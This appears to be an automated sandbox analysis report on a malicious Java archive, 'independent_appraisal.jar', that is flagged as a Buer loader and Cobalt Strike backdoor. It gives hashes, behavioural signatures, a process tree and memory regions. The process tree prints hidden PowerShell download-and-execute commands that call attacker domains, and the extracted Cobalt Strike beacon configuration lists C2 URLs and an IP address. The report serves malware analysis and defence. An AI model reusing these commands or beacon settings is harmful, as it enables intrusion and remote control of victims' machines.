buer | 25840b76b6cf2762898086cd4b62e556bedb9ffcff1a565bad872662c2e5bb36

Resubmissions

12-02-2021 17:46

210212-qj1pxv26za 10

12-02-2021 13:49

210212-qh2m1q4eyx 10

Analysis

max time kernel
1799s
max time network
1799s
platform
windows10_x64
resource
win10v20201028
submitted
12-02-2021 13:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

independent_appraisal.jar
Size

6KB
MD5

e94dbabc70b4396b39d3a3d3e53cf85b
SHA1

bc6f6267313c0a768ed3f8f92f90c1f105cbd949
SHA256

25840b76b6cf2762898086cd4b62e556bedb9ffcff1a565bad872662c2e5bb36
SHA512

fb2eb9aeb02d111c23cdb61f668affcfb3e847159ce8a158ed39e2f136b9993f8dc68ddbd649d8f13f75ced7f7499c6410861daa1fde8fb15c010c6ccd2f3582

Score

10^/10

buer cobaltstrike backdoor loader trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://luasdyfaenflkjasdfh.com:80/ujbgRNkjhThjlikOkihyrdtuyt3s

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://wieubfavbrgaxyaadf.com:80/fjahglknfuidfejfsknclbiuakemfamomffnwuagNFakibgiuhnIfaiurakifahgbaliof83u4inr

Extracted

Family

buer

antipublicwestbank.com

Extracted

Family

cobaltstrike

http://wieubfavbrgaxyaadf.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://213.252.245.98:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://luasdyfaenflkjasdfh.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
wieubfavbrgaxyaadf.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,213.252.245.98,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAABAAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAQAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
0
maxdns
255
month
0
pipe_name
polling_time
5000
port_number
443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYd1oQf060FSdDXzjBJqdlpV8YWyEYknN6Z9OBGmUfGC658UlUamK8rmhpR2H5ifIBvJq1FFRmC1P0KRYvvr731B3yvjDDiQR8z4PvUaIroO1g/i6BZZfoJRGl+LlUHFxzg+knc+irsSpjerv2BcnkZk3ajwFA2i/E6E2UtsWVHQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
4096
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.018915346e+09
uri
/N4215/adj/amzn.us.sr.aps
user_agent
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
year
0

Extracted

Family

cobaltstrike

http://wieubfavbrgaxyaadf.com:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

http://213.252.245.98:443/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

Attributes

access_type
512
beacon_type
2048
create_remote_thread
0
day
0
dns_idle
0
dns_sleep
0
host
wieubfavbrgaxyaadf.com,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books,213.252.245.98,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAABAAAAAUSG9zdDogd3d3LmFtYXpvbi5jb20AAAAHAAAAAAAAAAMAAAACAAAADnNlc3Npb24tdG9rZW49AAAAAgAAAAxza2luPW5vc2tpbjsAAAABAAAALGNzbS1oaXQ9cy0yNEtVMTFCQjgyUlpTWUdKM0JES3wxNDE5ODk5MDEyOTk2AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAQAAAAFEhvc3Q6IHd3dy5hbWF6b24uY29tAAAACQAAAApzej0xNjB4NjAwAAAACQAAABFvZT1vZT1JU08tODg1OS0xOwAAAAcAAAAAAAAABQAAAAJzbgAAAAkAAAAGcz0zNzE3AAAACQAAACJkY19yZWY9aHR0cCUzQSUyRiUyRnd3dy5hbWF6b24uY29tAAAABwAAAAEAAAADAAAABAAAAAAAAA==
http_method1
GET
http_method2
POST
injection_process
jitter
0
maxdns
255
month
0
pipe_name
polling_time
5000
port_number
443
proxy_password
proxy_server
proxy_username
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYd1oQf060FSdDXzjBJqdlpV8YWyEYknN6Z9OBGmUfGC658UlUamK8rmhpR2H5ifIBvJq1FFRmC1P0KRYvvr731B3yvjDDiQR8z4PvUaIroO1g/i6BZZfoJRGl+LlUHFxzg+knc+irsSpjerv2BcnkZk3ajwFA2i/E6E2UtsWVHQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
4096
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown3
0
unknown4
0
unknown5
2.018915346e+09
uri
/N4215/adj/amzn.us.sr.aps
user_agent
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
year
0

Signatures

Buer
Buer is a new modular loader first seen in August 2019.
loader buer
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 3928 created 2472 3928 WerFault.exe vdeodrv32.exe

description	pid	process	target process
PID 3928 created 2472	3928	WerFault.exe	vdeodrv32.exe

Buer Loader 1 IoCs

Detects Buer loader in memory or disk.

Processes:

resource	yara_rule
behavioral1/memory/2472-9-0x0000000040000000-0x000000004000A000-memory.dmp	buer

Blocklisted process makes network request 64 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	process
26	2264	powershell.exe
27	2264	powershell.exe
28	2264	powershell.exe
29	2264	powershell.exe
30	2264	powershell.exe
31	2264	powershell.exe
32	2264	powershell.exe
33	2264	powershell.exe
34	2264	powershell.exe
35	2264	powershell.exe
36	2264	powershell.exe
37	2264	powershell.exe
38	2264	powershell.exe
39	2264	powershell.exe
40	2264	powershell.exe
41	2264	powershell.exe
42	2264	powershell.exe
43	2264	powershell.exe
44	2264	powershell.exe
45	2264	powershell.exe
46	2264	powershell.exe
48	2224	powershell.exe
49	2224	powershell.exe
50	2264	powershell.exe
51	2224	powershell.exe
52	2264	powershell.exe
53	2224	powershell.exe
54	2264	powershell.exe
55	2224	powershell.exe
56	2264	powershell.exe
57	2224	powershell.exe
58	2264	powershell.exe
59	2224	powershell.exe
60	2264	powershell.exe
61	2224	powershell.exe
62	2264	powershell.exe
63	2224	powershell.exe
64	2264	powershell.exe
65	2224	powershell.exe
66	2264	powershell.exe
67	2224	powershell.exe
68	2264	powershell.exe
69	2224	powershell.exe
70	2264	powershell.exe
71	2224	powershell.exe
72	2264	powershell.exe
73	2224	powershell.exe
74	2264	powershell.exe
75	2224	powershell.exe
76	2264	powershell.exe
77	2224	powershell.exe
78	2264	powershell.exe
79	2224	powershell.exe
80	2264	powershell.exe
81	2264	powershell.exe
82	2224	powershell.exe
83	2264	powershell.exe
84	2224	powershell.exe
85	2264	powershell.exe
86	2224	powershell.exe
87	2264	powershell.exe
88	2224	powershell.exe
89	2264	powershell.exe
90	2224	powershell.exe

Executes dropped EXE 2 IoCs

Processes:

vdeodrv32.exevdeodrv32.exe

pid process

3936 vdeodrv32.exe
2472 vdeodrv32.exe
Loads dropped DLL 1 IoCs

Processes:

vdeodrv32.exe

pid process

3936 vdeodrv32.exe

pid	process
3936	vdeodrv32.exe
2472	vdeodrv32.exe

pid	process
3936	vdeodrv32.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vdeodrv32.exe

description	ioc	process
File opened (read-only)	\??\Y:	vdeodrv32.exe
File opened (read-only)	\??\L:	vdeodrv32.exe
File opened (read-only)	\??\O:	vdeodrv32.exe
File opened (read-only)	\??\U:	vdeodrv32.exe
File opened (read-only)	\??\X:	vdeodrv32.exe
File opened (read-only)	\??\Z:	vdeodrv32.exe
File opened (read-only)	\??\E:	vdeodrv32.exe
File opened (read-only)	\??\G:	vdeodrv32.exe
File opened (read-only)	\??\I:	vdeodrv32.exe
File opened (read-only)	\??\W:	vdeodrv32.exe
File opened (read-only)	\??\Q:	vdeodrv32.exe
File opened (read-only)	\??\R:	vdeodrv32.exe
File opened (read-only)	\??\S:	vdeodrv32.exe
File opened (read-only)	\??\T:	vdeodrv32.exe
File opened (read-only)	\??\A:	vdeodrv32.exe
File opened (read-only)	\??\H:	vdeodrv32.exe
File opened (read-only)	\??\N:	vdeodrv32.exe
File opened (read-only)	\??\P:	vdeodrv32.exe
File opened (read-only)	\??\V:	vdeodrv32.exe
File opened (read-only)	\??\M:	vdeodrv32.exe
File opened (read-only)	\??\B:	vdeodrv32.exe
File opened (read-only)	\??\F:	vdeodrv32.exe
File opened (read-only)	\??\J:	vdeodrv32.exe
File opened (read-only)	\??\K:	vdeodrv32.exe

Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

vdeodrv32.exe

description pid process target process

PID 3936 set thread context of 2472 3936 vdeodrv32.exe vdeodrv32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3928 2472 WerFault.exe vdeodrv32.exe

description	pid	process	target process
PID 3936 set thread context of 2472	3936	vdeodrv32.exe	vdeodrv32.exe

pid	pid_target	process	target process
3928	2472	WerFault.exe	vdeodrv32.exe

NSIS installer 6 IoCs

installer

Processes:

resource	yara_rule
C:\ProgramData\vdeodrv32.exe	nsis_installer_1
C:\ProgramData\vdeodrv32.exe	nsis_installer_2
C:\ProgramData\vdeodrv32.exe	nsis_installer_1
C:\ProgramData\vdeodrv32.exe	nsis_installer_2
C:\ProgramData\vdeodrv32.exe	nsis_installer_1
C:\ProgramData\vdeodrv32.exe	nsis_installer_2

Modifies data under HKEY_USERS 7 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeWerFault.exe

pid	process
2264	powershell.exe
2264	powershell.exe
2264	powershell.exe
2224	powershell.exe
2224	powershell.exe
2224	powershell.exe
2264	powershell.exe
2264	powershell.exe
1228	powershell.exe
1228	powershell.exe
1228	powershell.exe
1156	powershell.exe
1156	powershell.exe
1156	powershell.exe
2264	powershell.exe
2264	powershell.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

vdeodrv32.exe

pid process

3936 vdeodrv32.exe

pid	process
3936	vdeodrv32.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	2264	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeRestorePrivilege	3928	WerFault.exe
Token: SeBackupPrivilege	3928	WerFault.exe
Token: SeDebugPrivilege	3928	WerFault.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

java.exe

pid process

3976 java.exe
3976 java.exe
3976 java.exe
3976 java.exe

pid	process
3976	java.exe
3976	java.exe
3976	java.exe
3976	java.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

java.exevdeodrv32.exevdeodrv32.execmd.execmd.exepowershell.execmd.execmd.exe

description	pid	process	target process
PID 3976 wrote to memory of 3936	3976	java.exe	vdeodrv32.exe
PID 3976 wrote to memory of 3936	3976	java.exe	vdeodrv32.exe
PID 3976 wrote to memory of 3936	3976	java.exe	vdeodrv32.exe
PID 3936 wrote to memory of 2472	3936	vdeodrv32.exe	vdeodrv32.exe
PID 3936 wrote to memory of 2472	3936	vdeodrv32.exe	vdeodrv32.exe
PID 3936 wrote to memory of 2472	3936	vdeodrv32.exe	vdeodrv32.exe
PID 3936 wrote to memory of 2472	3936	vdeodrv32.exe	vdeodrv32.exe
PID 2472 wrote to memory of 4000	2472	vdeodrv32.exe	cmd.exe
PID 2472 wrote to memory of 4000	2472	vdeodrv32.exe	cmd.exe
PID 2472 wrote to memory of 4000	2472	vdeodrv32.exe	cmd.exe
PID 4000 wrote to memory of 2264	4000	cmd.exe	powershell.exe
PID 4000 wrote to memory of 2264	4000	cmd.exe	powershell.exe
PID 4000 wrote to memory of 2264	4000	cmd.exe	powershell.exe
PID 2472 wrote to memory of 484	2472	vdeodrv32.exe	cmd.exe
PID 2472 wrote to memory of 484	2472	vdeodrv32.exe	cmd.exe
PID 2472 wrote to memory of 484	2472	vdeodrv32.exe	cmd.exe
PID 484 wrote to memory of 2224	484	cmd.exe	powershell.exe
PID 484 wrote to memory of 2224	484	cmd.exe	powershell.exe
PID 484 wrote to memory of 2224	484	cmd.exe	powershell.exe
PID 2264 wrote to memory of 2656	2264	powershell.exe	svchost.exe
PID 2472 wrote to memory of 3716	2472	vdeodrv32.exe	cmd.exe
PID 2472 wrote to memory of 3716	2472	vdeodrv32.exe	cmd.exe
PID 2472 wrote to memory of 3716	2472	vdeodrv32.exe	cmd.exe
PID 3716 wrote to memory of 1228	3716	cmd.exe	powershell.exe
PID 3716 wrote to memory of 1228	3716	cmd.exe	powershell.exe
PID 3716 wrote to memory of 1228	3716	cmd.exe	powershell.exe
PID 2472 wrote to memory of 964	2472	vdeodrv32.exe	cmd.exe
PID 2472 wrote to memory of 964	2472	vdeodrv32.exe	cmd.exe
PID 2472 wrote to memory of 964	2472	vdeodrv32.exe	cmd.exe
PID 964 wrote to memory of 1156	964	cmd.exe	powershell.exe
PID 964 wrote to memory of 1156	964	cmd.exe	powershell.exe
PID 964 wrote to memory of 1156	964	cmd.exe	powershell.exe
PID 2264 wrote to memory of 2348	2264	powershell.exe	svchost.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2656

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\independent_appraisal.jar
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3976
- C:\ProgramData\vdeodrv32.exe
  "C:\ProgramData\vdeodrv32.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3936
- - C:\ProgramData\vdeodrv32.exe
    "C:\ProgramData\vdeodrv32.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2264
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://luasdyfaenflkjasdfh.com:80/ujbgRNkjhThjlikOkihyrdtuyt3s'))"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:484
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://luasdyfaenflkjasdfh.com:80/ujbgRNkjhThjlikOkihyrdtuyt3s'))"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2224
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/fjahglknfuidfejfsknclbiuakemfamomffnwuagNFakibgiuhnIfaiurakifahgbaliof83u4inr'))"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3716
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/fjahglknfuidfejfsknclbiuakemfamomffnwuagNFakibgiuhnIfaiurakifahgbaliof83u4inr'))"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1228
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:964
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://wieubfavbrgaxyaadf.com:80/GoogleUpdate/Chrome/v12.142.3412/ChromeUpdate.exe'))"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 20824
      4⤵
      Suspicious use of NtCreateProcessExOtherParentProcess
      Program crash
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3928

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2348

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\vdeodrv32.exe

MD5
69819de123d7b83d5881932d706841f5

SHA1
27fe7625cb44c9870fdaf810ec42cb02a0191c86

SHA256
650750b450fd881501aa5a879696e9d61e8fcbbad479ce37b0a2bb081d73c209

SHA512
fdd8578698fbcd278ee0c6820d57b834fd20a9172d8652ddbfd02b12b8f8f63845af01401838ef9b8c342fab919c74da53e4062271c157eb5bfa67a22ec9b907

Download Submit
C:\ProgramData\vdeodrv32.exe

MD5
69819de123d7b83d5881932d706841f5

SHA1
27fe7625cb44c9870fdaf810ec42cb02a0191c86

SHA256
650750b450fd881501aa5a879696e9d61e8fcbbad479ce37b0a2bb081d73c209

SHA512
fdd8578698fbcd278ee0c6820d57b834fd20a9172d8652ddbfd02b12b8f8f63845af01401838ef9b8c342fab919c74da53e4062271c157eb5bfa67a22ec9b907

Download Submit
C:\ProgramData\vdeodrv32.exe

MD5
69819de123d7b83d5881932d706841f5

SHA1
27fe7625cb44c9870fdaf810ec42cb02a0191c86

SHA256
650750b450fd881501aa5a879696e9d61e8fcbbad479ce37b0a2bb081d73c209

SHA512
fdd8578698fbcd278ee0c6820d57b834fd20a9172d8652ddbfd02b12b8f8f63845af01401838ef9b8c342fab919c74da53e4062271c157eb5bfa67a22ec9b907

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5
5f640bd48e2547b4c1a7421f080f815f

SHA1
a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

SHA256
916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

SHA512
a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

Download Submit
\Users\Admin\AppData\Local\Temp\nsl450.tmp\System.dll

MD5
fccff8cb7a1067e23fd2e2b63971a8e1

SHA1
30e2a9e137c1223a78a0f7b0bf96a1c361976d91

SHA256
6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e

SHA512
f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

Download Submit
memory/484-29-0x0000000000000000-mapping.dmp

Download
memory/964-72-0x0000000000000000-mapping.dmp

Download
memory/1156-73-0x0000000000000000-mapping.dmp

Download
memory/1156-78-0x0000000004CA2000-0x0000000004CA3000-memory.dmp

Filesize
4KB

Download
memory/1156-74-0x0000000072810000-0x0000000072EFE000-memory.dmp

Filesize
6.9MB

Download
memory/1156-76-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

Filesize
4KB

Download
memory/1156-88-0x0000000004CA3000-0x0000000004CA4000-memory.dmp

Filesize
4KB

Download
memory/1156-90-0x0000000009A40000-0x0000000009A7D000-memory.dmp

Filesize
244KB

Download
memory/1228-71-0x0000000008E10000-0x0000000008E4D000-memory.dmp

Filesize
244KB

Download
memory/1228-70-0x0000000006710000-0x0000000006743000-memory.dmp

Filesize
204KB

Download
memory/1228-69-0x0000000000BD3000-0x0000000000BD4000-memory.dmp

Filesize
4KB

Download
memory/1228-65-0x0000000000BD2000-0x0000000000BD3000-memory.dmp

Filesize
4KB

Download
memory/1228-63-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/1228-55-0x0000000072810000-0x0000000072EFE000-memory.dmp

Filesize
6.9MB

Download
memory/1228-54-0x0000000000000000-mapping.dmp

Download
memory/2224-30-0x0000000000000000-mapping.dmp

Download
memory/2224-31-0x0000000072810000-0x0000000072EFE000-memory.dmp

Filesize
6.9MB

Download
memory/2224-48-0x0000000008DE0000-0x0000000008E1D000-memory.dmp

Filesize
244KB

Download
memory/2224-47-0x0000000006730000-0x0000000006763000-memory.dmp

Filesize
204KB

Download
memory/2224-46-0x00000000041F3000-0x00000000041F4000-memory.dmp

Filesize
4KB

Download
memory/2224-40-0x00000000041F2000-0x00000000041F3000-memory.dmp

Filesize
4KB

Download
memory/2224-38-0x00000000041F0000-0x00000000041F1000-memory.dmp

Filesize
4KB

Download
memory/2264-13-0x0000000006EF0000-0x0000000006EF1000-memory.dmp

Filesize
4KB

Download
memory/2264-19-0x0000000007C60000-0x0000000007C61000-memory.dmp

Filesize
4KB

Download
memory/2264-22-0x0000000006EF2000-0x0000000006EF3000-memory.dmp

Filesize
4KB

Download
memory/2264-28-0x0000000009660000-0x000000000969D000-memory.dmp

Filesize
244KB

Download
memory/2264-27-0x0000000006F60000-0x0000000006F93000-memory.dmp

Filesize
204KB

Download
memory/2264-21-0x0000000008160000-0x0000000008161000-memory.dmp

Filesize
4KB

Download
memory/2264-26-0x0000000006EF3000-0x0000000006EF4000-memory.dmp

Filesize
4KB

Download
memory/2264-25-0x00000000090F0000-0x00000000090F1000-memory.dmp

Filesize
4KB

Download
memory/2264-24-0x0000000009960000-0x0000000009961000-memory.dmp

Filesize
4KB

Download
memory/2264-94-0x0000000002CD0000-0x0000000002CD1000-memory.dmp

Filesize
4KB

Download
memory/2264-51-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/2264-50-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/2264-11-0x0000000000000000-mapping.dmp

Download
memory/2264-12-0x0000000072810000-0x0000000072EFE000-memory.dmp

Filesize
6.9MB

Download
memory/2264-20-0x0000000007FD0000-0x0000000007FD1000-memory.dmp

Filesize
4KB

Download
memory/2264-23-0x0000000008440000-0x0000000008441000-memory.dmp

Filesize
4KB

Download
memory/2264-18-0x00000000073E0000-0x00000000073E1000-memory.dmp

Filesize
4KB

Download
